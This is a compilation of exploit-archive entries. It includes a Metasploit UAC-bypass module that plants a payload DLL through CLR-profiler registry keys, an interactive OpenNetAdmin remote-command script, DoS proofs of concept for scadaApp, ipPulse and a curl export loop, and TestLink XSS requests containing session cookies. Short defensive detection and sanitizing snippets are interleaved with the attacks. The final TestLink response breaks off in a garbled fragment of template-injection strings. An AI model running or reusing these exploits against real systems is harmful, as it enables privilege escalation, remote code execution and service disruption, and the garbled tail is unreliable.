curl -s -k --connect-timeout 5 -m 5 "$url/api.php?xm=system.database&f=json&a\[username\]=&a\[password\]=$reseller|$pass&a\[action\]=export&a\[filename\]=/dev/zero"&
}

for i in {0..32}
do
dwn /dev/zero
sleep .1
done
echo "
Done!"


scadaApp For iOS 1.1.4.0 Denial Of Service


scadaApp for iOS version 1.1.4.0 suffers from a denial of service vulnerability.


MD5 | ff85010e64b7dc5aa39cebf3d96e416a

# Exploit Title: scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-18
# Vendor Homepage: https://apps.apple.com/ca/app/scadaapp/id1206266634
# Software Link: App Store for iOS devices
# Tested Version: 1.1.4.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 13.2

# Steps to Produce the Crash:
# 1.- Run python code: scadaApp_for_iOS_1.1.4.0.py
# 2.- Copy content to clipboard
# 3.- Open "scadaApp for iOS"
# 4.- Let's go
# 5.- Username > "l4m5"
# 6.- Password > "l4m5"
# 7.- Paste ClipBoard on "Servername"
# 8.- Login
# 9.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 257
print (buffer)

Windows Escalate UAC Protection Bypass Via Dot Net Profiler


Microsoft Windows allows for the automatic loading of a profiling COM object during the launch of a CLR process based on certain environment variables ostensibly to monitor execution. In this case, the authors abuse the profiler by pointing to a payload DLL that will be launched as the profiling thread. This thread will run at the permission level of the calling process, so an auto-elevating process will launch the DLL with elevated permissions. In this case, they use gpedit.msc as the auto-elevated CLR process, but others would work, too.


MD5 | 465589077d4444936024dfe8a99d25c1

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Post::Windows::Priv
include Post::Windows::Runas

def initialize(info={})
super(update_info(info,
'Name' => 'Windows Escalate UAC Protection Bypass (Via dot net profiler)',
'Description' => %q(
Microsoft Windows allows for the automatic loading of a profiling COM object during
the launch of a CLR process based on certain environment variables ostensibly to
monitor execution. In this case, we abuse the profiler by pointing to a payload DLL
that will be launched as the profiling thread. This thread will run at the permission
level of the calling process, so an auto-elevating process will launch the DLL with
elevated permissions. In this case, we use gpedit.msc as the auto-elevated CLR
process, but others would work, too.
),
'License' => MSF_LICENSE,
'Author' => [
'Casey Smith', # UAC bypass discovery and research
'"Stefan Kanthak"<stefan.kanthak () nexgo de>', # UAC bypass discovery and research
'bwatters-r7', # Module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultTarget' => 0,
'Notes' =>
{
'SideEffects' => [ ARTIFACTS_ON_DISK ]
},
'References' =>
[
['URL', 'https://seclists.org/fulldisclosure/2017/Jul/11'],
['URL', 'https://offsec.provadys.com/UAC-bypass-dotnet.html']
],
'DisclosureDate' => 'Mar 17 2017'
)
)
register_options(
[OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])]
)

end

def check
if sysinfo['OS'] =~ /Windows (7|8|2008|2012|10)/ && is_uac_enabled?
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end

def write_reg_value(registry_hash)
vprint_status("Writing #{registry_hash[:value_name]} to #{registry_hash[:key_name]}")
begin
if not registry_key_exist?(registry_hash[:key_name])
registry_createkey(registry_hash[:key_name])
registry_hash[:delete_on_cleanup] = true
else
registry_hash[:delete_on_cleanup] = false
end
registry_setvaldata(registry_hash[:key_name], \
registry_hash[:value_name], \
registry_hash[:value_value], \
registry_hash[:value_type])
rescue Rex::Post::Meterpreter::RequestError => e
print_error(e.to_s)
end
end

def remove_reg_value(registry_hash)
# we may have already deleted the key
return unless registry_key_exist?(registry_hash[:key_name])
begin
if registry_hash[:delete_on_cleanup]
vprint_status("Deleting #{registry_hash[:key_name]} key")
registry_deletekey(registry_hash[:key_name])
else
vprint_status("Deleting #{registry_hash[:value_name]} from #{registry_hash[:key_name]} key")
registry_deleteval(registry_hash[:key_name], registry_hash[:value_name])
end
rescue Rex::Post::Meterpreter::RequestError => e
print_bad("Unable to clean up registry")
print_error(e.to_s)
end
end

def exploit
check_permissions!
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
when UAC_DEFAULT
print_good('UAC is set to Default')
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
shell_execute_exe
return
end

# get directory locations straight
win_dir = session.sys.config.getenv('windir')
vprint_status("win_dir = " + win_dir)
tmp_dir = session.sys.config.getenv('tmp')
vprint_status("tmp_dir = " + tmp_dir)
exploit_dir = win_dir + "\\System32\\"
    vprint_status("exploit_dir = " + exploit_dir)
    target_filepath = exploit_dir + "gpedit.msc"
    vprint_status("target_filepath = " + target_filepath)
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.dll'
    payload_pathname = tmp_dir + '\\' + payload_name

    # make payload
    vprint_status("Making Payload")
    vprint_status("payload_pathname = " + payload_pathname)
    payload = generate_payload_dll

    uuid = SecureRandom.uuid
    vprint_status("UUID = #{uuid}")
    reg_keys = []
    # This reg key will not hurt anything in windows 10+, but is not required.
    unless sysinfo['OS'] =~ /Windows (2016|10)/
      reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
                    value_name: '',
                    value_type: "REG_EXPAND_SZ",
                    value_value: payload_pathname,
                    delete_on_cleanup: false)
    end
    reg_keys.push(key_name: "HKCU\\Environment",
                  value_name: "COR_PROFILER",
                  value_type: "REG_SZ",
                  value_value: "{#{uuid}}",
                  delete_on_cleanup: false)
    reg_keys.push(key_name: "HKCU\\Environment",
                  value_name: "COR_ENABLE_PROFILING",
                  value_type: "REG_SZ",
                  value_value: "1",
                  delete_on_cleanup: false)
    reg_keys.push(key_name: "HKCU\\Environment",
                  value_name: "COR_PROFILER_PATH",
                  value_type: "REG_SZ",
                  value_value: payload_pathname,
                  delete_on_cleanup: false)
    reg_keys.each do |key_hash|
      write_reg_value(key_hash)
    end

    # Upload payload
    vprint_status("Uploading Payload to #{payload_pathname}")
    write_file(payload_pathname, payload)
    vprint_status("Payload Upload Complete")

    vprint_status("Launching " + target_filepath)
    begin
      session.sys.process.execute("cmd.exe /c \"#{target_filepath}\"", nil, 'Hidden' => true)
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error(e.to_s)
    end
    print_warning("This exploit requires manual cleanup of '#{payload_pathname}'!")
    # wait for a few seconds before cleaning up
    print_status("Please wait for session and cleanup....")
    sleep(20)
    vprint_status("Removing Registry Changes")
    reg_keys.each do |key_hash|
      remove_reg_value(key_hash)
    end
    vprint_status("Registry Changes Removed")
  end

  def check_permissions!
    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
    # Check if you are an admin
    # is_in_admin_group can be nil, true, or false
    print_status('UAC is Enabled, checking level...')
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end
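The values the module writes under HKCU\Environment (COR_ENABLE_PROFILING, COR_PROFILER and COR_PROFILER_PATH, plus the InprocServer32 key for the random CLSID on older Windows) are exactly what a defender can hunt for on an endpoint. The following check is an added example, not part of the module or of Metasploit: it parses a `reg export HKCU\Environment` dump and flags an enabled CLR profiler whose DLL lives outside Program Files or Windows; the .reg text, CLSID and DLL name are constructed.

```python
import re
from pathlib import PureWindowsPath

# A legitimate profiler (APM agent, etc.) installs under one of these; a DLL
# dropped in a user temp directory, as the module above does, does not.
TRUSTED_DIRS = ("program files", "program files (x86)", "windows")

# Constructed sample of `reg export HKCU\Environment` output (not from the page).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Environment]
"Path"="C:\\Users\\alice\\AppData\\Local\\Microsoft\\WindowsApps"
"COR_ENABLE_PROFILING"="1"
"COR_PROFILER"="{9f1d4d2e-0a1b-4c3d-8e7f-1234567890ab}"
"COR_PROFILER_PATH"="C:\\Users\\alice\\AppData\\Local\\Temp\\xfeQjkL.dll"
'''

_VALUE = re.compile(r'^"([^"]+)"="(.*)"$')  # quoted REG_SZ/REG_EXPAND_SZ lines only

def parse_reg_strings(text):
    """Return {name: value} for the quoted string values in a .reg dump."""
    values = {}
    for line in text.splitlines():
        m = _VALUE.match(line.strip())
        if m:
            # .reg syntax doubles backslashes and escapes quotes; undo both.
            values[m.group(1)] = m.group(2).replace('\\\\', '\\').replace('\\"', '"')
    return values

def profiler_findings(values):
    """Describe why the CLR profiler settings in `values` look like DLL hijacking."""
    if values.get("COR_ENABLE_PROFILING") != "1":
        return []  # profiling is off: the COR_PROFILER* values are inert
    findings = []
    path = values.get("COR_PROFILER_PATH")
    if path is None:
        # Without a path the CLSID in COR_PROFILER is resolved through
        # HKCU\Software\Classes\CLSID\{...}\InprocServer32, the key the module
        # above also writes on older Windows; inspect that key next.
        return ["COR_ENABLE_PROFILING=1 with no COR_PROFILER_PATH; resolve CLSID "
                + str(values.get("COR_PROFILER"))]
    parts = [p.lower() for p in PureWindowsPath(path).parts]
    if len(parts) < 2 or parts[1] not in TRUSTED_DIRS:
        findings.append("profiler DLL in a user-writable location: " + path)
    if not values.get("COR_PROFILER", "").startswith("{"):
        findings.append("COR_PROFILER is not a CLSID: " + repr(values.get("COR_PROFILER")))
    return findings
```

Run it as `profiler_findings(parse_reg_strings(open("env.reg", encoding="utf-16").read()))` against a real export; `reg export` writes UTF-16.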

OpenNetAdmin 18.1.1 Remote Code Execution

OpenNetAdmin version 18.1.1 suffers from a remote code execution vulnerability.


MD5 | b78ce6ccdab3eb00a716398e6fcf7e4f

# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

#!/bin/bash

URL="${1}"
while true; do
  echo -n "$ "; read cmd
  curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
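The injection above rides in the `ip=>...` argument of an xajax `window_submit` call to the ping tooltip, so a request body for that endpoint whose key=>value argument carries shell metacharacters is the thing to alert on at the proxy or WAF. As an added example that is not part of the exploit or of OpenNetAdmin, this Python function decodes a form body and flags such arguments; both sample bodies are constructed.

```python
from urllib.parse import unquote_plus

# Characters that let a value escape the shell command the ping tooltip
# builds around it; a plain IPv4 address or hostname never needs them.
SHELL_META = set(";|&`$(){}<>\n")

def parse_body(body):
    """Decode a form-encoded body into {field: [values]} without any framework."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return fields

def suspicious_xajax(body):
    """Return findings for a POST aimed at ONA's xajax endpoint.

    A `window_submit` call is flagged when one of its key=>value arguments
    (the form the tooltip handler parses, e.g. ip=>10.0.0.5) carries shell
    metacharacters, which is how the exploit above smuggles its command.
    """
    fields = parse_body(body)
    if fields.get("xajax") != ["window_submit"]:
        return []
    findings = []
    for arg in fields.get("xajaxargs[]", []):
        key, sep, value = arg.partition("=>")
        if not sep:
            continue  # positional args such as "tooltips" or "ping"
        bad = sorted(SHELL_META & set(value))
        if bad:
            findings.append("%s=>%r contains %s" % (key, value, bad))
    return findings

# Constructed sample bodies (not from the page): a legitimate ping tooltip
# request and one carrying an injected command.
LEGIT = ("xajax=window_submit&xajaxr=1&xajaxargs[]=tooltips"
         "&xajaxargs[]=ip%3D%3E10.0.0.5&xajaxargs[]=ping")
INJECTED = ("xajax=window_submit&xajaxr=1&xajaxargs[]=tooltips"
            "&xajaxargs[]=ip%3D%3E10.0.0.5;id&xajaxargs[]=ping")

if __name__ == "__main__":
    for body in (LEGIT, INJECTED):
        print(suspicious_xajax(body) or "clean")
```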

ipPulse 1.92 Denial Of Service

ipPulse version 1.92 suffers from an Enter Key denial of service vulnerability.


MD5 | 516720de62a4544f73c1db153fcf6f81

# Exploit Title: ipPulse 1.92 - 'Enter Key' Denial of Service (PoC)
# Discovery by: Diego Buztamante
# Discovery Date: 2019-11-18
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
# Software Link : http://download.netscantools.com/ipls192.zip
# Tested Version: 1.92
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code : python ipPulse_1.92.py
# 2.- Open ipPulse_1.92.txt and copy content to clipboard
# 3.- Open ippulse.exe
# 4.- Click on "Enter Key"
# 5.- Paste ClipBoard on "Name: "
# 6.- OK
# 7.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 256
with open("ipPulse_1.92.txt", "w") as f:
    f.write(buffer)

TestLink 1.9.19 Cross Site Scripting

TestLink version 1.9.19 suffers from a persistent cross site scripting vulnerability.


MD5 | af0a67425ac7a717dac253361aae3e1b

# Exploit Title: TestLink 1.9.19 - Persistent Cross-Site Scripting
# Date: 2019-11-20
# Exploit Author: Milad Khoshdel
# Software Link: http://testlink.org/
# Version: TestLink 1.9.19
# Tested on: Linux Apache/2 PHP/7.3.11


=========
Vulnerable Pages:
=========

Persistent --> https://[TestLink-URL]/testlink/lib/testcases/archiveData.php?add_relation_feedback_msg=Test%20Case%20with%20external%20ID%3A%20%20-%20does%20not%20exist&edit=%3cscRipt%3ealert(0x008B19)%3c%2fscRipt%3e&id=4&show_mode=show&version_id=3
Non-Persistent --> https://[TestLink-URL]/testlink/index.php?caller=login&reqURI=javascript%3aalert(0x002082)&viewer=3
Non-Persistent --> https://[TestLink-URL]/testlink/lib/testcases/tcEdit.php?doAction=doDeleteStep&nsextt=%3cscRipt%3ealert(0x00A5CA)%3c%2fscRipt%3e&show_mode=editDisabled&step_id=
Non-Persistent --> https://[TestLink-URL]/testlink/lib/testcases/tcEdit.php?doAction=doDeleteStep&%3cscRipt%3ealert(0x00A5CE)%3c%2fscRipt%3e=nsextt&show_mode=editDisabled
Non-Persistent --> https://[TestLink-URL]/testlink/lib/testcases/tcEdit.php?doAction=doDeleteStep&show_mode=%3cscRipt%3ealert(0x00A54D)%3c%2fscRipt%3e&step_id=


=========
POC:
=========

REQUEST -->

GET /testlink/index.php?caller=login&reqURI=javascript%3aalert(0x002082)&viewer=3 HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=7sjusfplttil0vsrv31ll2on2v; TESTLINK197TL_execSetResults_bn_view_status=0; TESTLINK197TL_execSetResults_platform_notes_view_status=0; TESTLINK197TL_execSetResults_tpn_view_status=0; TL_lastTestProjectForUserID_2=1; TESTLINK197TL_lastTestPlanForUserID_1=2; TESTLINK197TL_user2_proj1_testPlanId=2; TESTLINK_USER_AUTH_COOKIE=09d24c73361bc02964e80077a0b797b6fc2c1afb74c52ceea74c63311365fadd
Referer: http://127.0.0.1/testlink/login.php?viewer=3
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36


RESPONSE -->

HTTP/1.1 200 OK
Server: Apache
Content-Length: 526
X-Powered-By: PHP/7.3.11
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=50
X-Frame-Options: SAMEORIGIN
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Date: Wed, 20 Nov 2019 11:29:45 GMT
Vary: Cookie,Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate

<!DOCTYPE html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-language" content="en" />
<meta name="generator" content="testlink" />
<meta name="author" content="TestLink Development Team" />
<meta name="copyright" content="TestLink Development Team" />
<meta name="robots" content="NOFOLLOW" />
<title>TestLink 1.9.19</title>
<meta name="description" content="TestLink - TestLink ::: Main Page" />
<link rel="icon" href="http://127.0.0.1/testlink/gui/themes/default/images/favicon.ico" type="image/x-icon" />
</head>


<frameset rows="70,*" frameborder="0" framespacing="0">
<frame src="lib/general/navBar.php?tproject_id=0&tplan_id=0&updateMainPage=1" name="titlebar" scrolling="no" noresize="noresize" />
<frame src="javascript:alert(0x002082)" scrolling='auto' name='mainframe' />
<noframes>
<body>
TestLink required a frames supporting browser.
</body>
</noframes>
</frameset>


-------------------------------------------------

STEP 1 -->

[Request]
GET /testlink/lib/testcases/archiveData.php?add_relation_feedback_msg=Test%20Case%20with%20external%20ID%3A%20%20-%20does%20not%20exist&edit=%3cscRipt%3ealert(0x008B19)%3c%2fscRipt%3e&id=4&show_mode=show&version_id=3 HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=7sjusfplttil0vsrv31ll2on2v; TESTLINK197TL_execSetResults_bn_view_status=0; TESTLINK197TL_execSetResults_platform_notes_view_status=0; TESTLINK197TL_execSetResults_tpn_view_status=0; TESTLINK197ys-tproject_1_ext-comp-1001=a%3As%253A%2F1%2F3; TESTLINK_USER_AUTH_COOKIE=09d24c73361bc02964e80077a0b797b6fc2c1afb74c52ceea74c63311365fadd; TESTLINK197TL_user2_proj1_testPlanId=2; TESTLINK197TL_lastTestPlanForUserID_1=2; TL_lastTestProjectForUserID_2=1
Referer: http://127.0.0.1/testlink/lib/testcases/tcEdit.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36


[Response]
HTTP/1.1 200 OK
Server: Apache
Content-Length: 0
X-Powered-By: PHP/7.3.11
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=47
X-Frame-Options: SAMEORIGIN
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Date: Wed, 20 Nov 2019 11:59:45 GMT
Vary: Cookie
Cache-Control: no-store, no-cache, must-revalidate

STEP 2 -->

[Request]
GET /testlink/lib/testcases/archiveData.php?add_relation_feedback_msg=Test%20Case%20with%20external%20ID%3A%20%20-%20does%20not%20exist&edit=testcase&id=127.0.0.1/trace.axd&show_mode=show&version_id=3 HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=7sjusfplttil0vsrv31ll2on2v; TESTLINK197TL_execSetResults_bn_view_status=0; TESTLINK197TL_execSetResults_platform_notes_view_status=0; TESTLINK197TL_execSetResults_tpn_view_status=0; TESTLINK197ys-tproject_1_ext-comp-1001=a%3As%253A%2F1%2F3; TESTLINK_USER_AUTH_COOKIE=09d24c73361bc02964e80077a0b797b6fc2c1afb74c52ceea74c63311365fadd; TESTLINK197TL_user2_proj1_testPlanId=2; TL_lastTestProjectForUserID_2=1; TESTLINK197TL_lastTestPlanForUserID_1=2
Referer: http://127.0.0.1/testlink/lib/testcases/tcEdit.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36


[Response]
#Identification Page
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Server: Apache
X-Powered-By: PHP/7.3.11
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=98
X-Frame-Options: SAMEORIGIN
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Date: Wed, 20 Nov 2019 12:02:38 GMT
Vary: Cookie,Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate

ner_title_{php}Smarty_Resource::parseResourceName(system("ns,[container_title_<scRipt>alert(0x008B19)</scRipt>] => container_title_<scRipt>alert(0x008B19)</scRipt>,[container_title_{{_self.env.registerUndefinedFilterCallback("sys
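The first exchange above shows `reqURI` landing verbatim in the main frame's `src`, and the later ones show `edit` and `nsextt` reflected without encoding; the fix is to validate the frame target and to encode whatever is emitted for the attribute context. As an added example that is not TestLink's code, this Python function accepts only relative paths inside the application and HTML-encodes the result; DEFAULT_FRAME_TARGET is a hypothetical fallback, not TestLink's real default page.

```python
import html
from urllib.parse import urlsplit, unquote

# Hypothetical fallback; TestLink's real default main-frame page is not shown above.
DEFAULT_FRAME_TARGET = "lib/general/mainPage.php"

def is_local_app_path(target):
    """True only for a non-empty relative path inside the application tree."""
    decoded = unquote(target).strip()
    if not decoded or any(ord(c) < 0x20 for c in decoded):
        return False  # empty, or control characters used to mask a scheme
    parts = urlsplit(decoded)
    if parts.scheme or parts.netloc:
        return False  # javascript:, data:, http://host/..., //host/...
    if decoded.startswith("/") or "\\" in decoded:
        return False  # absolute or backslash-obfuscated paths
    return ".." not in parts.path.split("/")  # no climbing out of the tree

def frame_src(req_uri):
    """Attribute value for the main frame's src, built from an untrusted reqURI.

    Two independent controls: the target is validated, and whatever is emitted
    is HTML-attribute-encoded so a surviving '<', '"' or '&' cannot break out
    of the attribute (the encoding the reflections above lack)."""
    target = req_uri if is_local_app_path(req_uri) else DEFAULT_FRAME_TARGET
    return html.escape(target, quote=True)

def mainframe_tag(req_uri):
    """Render the frame element from the first response above with a safe src."""
    return '<frame src="%s" scrolling="auto" name="mainframe" />' % frame_src(req_uri)

if __name__ == "__main__":
    for uri in ("javascript:alert(0x002082)", "lib/testcases/archiveData.php?id=4"):
        print(mainframe_tag(uri))
```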
